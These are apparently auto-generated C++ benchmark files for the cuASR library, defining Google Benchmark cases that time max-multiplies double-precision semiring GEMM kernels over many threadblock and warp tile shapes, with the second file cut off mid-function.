2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x128x16_8x32x1_2x4_4x8_4x4) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 2 x 2 // Threads / Warp: 8 x 4 // Warps / Block: 4 x 4 // Threadblock: 64 x 32 x 16 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x32x16_16x8x1_2x2_8x4_4x4(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<64, 32, 16>; using WarpShape = cutlass::gemm::GemmShape<16, 8, 16>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x32x16_16x8x1_2x2_8x4_4x4) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 2 // Threads / Warp: 4 x 8 // Warps / Block: 4 x 4 // Threadblock: 64 x 64 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x64x8_16x16x1_4x2_4x8_4x4(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<64, 64, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x64x8_16x16x1_4x2_4x8_4x4) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 2 // Threads / Warp: 8 x 4 // Warps / Block: 4 x 4 // Threadblock: 128 x 32 x 16 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_128x32x16_32x8x1_4x2_8x4_4x4(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<128, 32, 16>; using WarpShape = cutlass::gemm::GemmShape<32, 8, 16>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_128x32x16_32x8x1_4x2_8x4_4x4) ->RangeMultiplier(2)->Range(256, 4096); #endif
023df7b5c9b09af407347ce1efeb7ba7230c58e3.cu
/*************************************************************************************************** * Copyright (c) 2020, Vijay Thakkar ([email protected]). **************************************************************************************************/ ////////////////////////////////////////////////////////////////////// // THIS BENCHMARK FILE IS GENERATED AUTOMATICALLY : DO NOT MODIFY // ////////////////////////////////////////////////////////////////////// #include "benchmark/benchmark.h" #include "cuasr/gemm/device/default_srgemm_configuration.h" #include "cuasr/gemm/device/srgemm.h" #include "cuasr/functional.h" #include "harness.h" //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 2 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 1 x 1 // Threadblock: 8 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 1) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_8x32x8_8x32x1_2x4_4x8_1x1(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<8, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<8, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_8x32x8_8x32x1_2x4_4x8_1x1) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 1 x 1 // Threadblock: 16 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 1) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x32x8_16x32x1_4x4_4x8_1x1(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<16, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x32x8_16x32x1_4x4_4x8_1x1) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 8 // Threads / Warp: 4 x 8 // Warps / Block: 1 x 1 // Threadblock: 16 x 64 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 1) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x64x8_16x64x1_4x8_4x8_1x1(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<16, 64, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 64, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x64x8_16x64x1_4x8_4x8_1x1) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 8 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 1 x 1 // Threadblock: 32 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 0) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_32x32x1_8x4_4x8_1x1(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<32, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_32x32x1_8x4_4x8_1x1) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 2 x 2 // Threads / Warp: 4 x 8 // Warps / Block: 1 x 2 // Threadblock: 8 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_8x32x8_8x16x1_2x2_4x8_1x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<8, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<8, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_8x32x8_8x16x1_2x2_4x8_1x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 2 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 1 x 2 // Threadblock: 8 x 64 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 1) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_8x64x8_8x32x1_2x4_4x8_1x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<8, 64, 8>; using WarpShape = cutlass::gemm::GemmShape<8, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_8x64x8_8x32x1_2x4_4x8_1x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 2 // Threads / Warp: 4 x 8 // Warps / Block: 1 x 2 // Threadblock: 16 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x32x8_16x16x1_4x2_4x8_1x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<16, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x32x8_16x16x1_4x2_4x8_1x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 1 x 2 // Threadblock: 16 x 64 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x64x8_16x32x1_4x4_4x8_1x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<16, 64, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x64x8_16x32x1_4x4_4x8_1x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 8 // Threads / Warp: 4 x 8 // Warps / Block: 1 x 2 // Threadblock: 16 x 128 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 1) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x128x8_16x64x1_4x8_4x8_1x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<16, 128, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 64, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x128x8_16x64x1_4x8_4x8_1x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 4 // Threads / Warp: 8 x 4 // Warps / Block: 1 x 2 // Threadblock: 32 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 1) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_32x16x1_4x4_8x4_1x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<32, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_32x16x1_4x4_8x4_1x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 8 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 1 x 2 // Threadblock: 32 x 64 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 1) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x64x8_32x32x1_8x4_4x8_1x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 64, 8>; using WarpShape = cutlass::gemm::GemmShape<32, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x64x8_32x32x1_8x4_4x8_1x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 1 // Threadblock: 32 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_16x32x1_4x4_4x8_2x1(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_16x32x1_4x4_4x8_2x1) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 8 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 1 // Threadblock: 64 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 1) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x32x8_32x32x1_8x4_4x8_2x1(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<64, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<32, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; 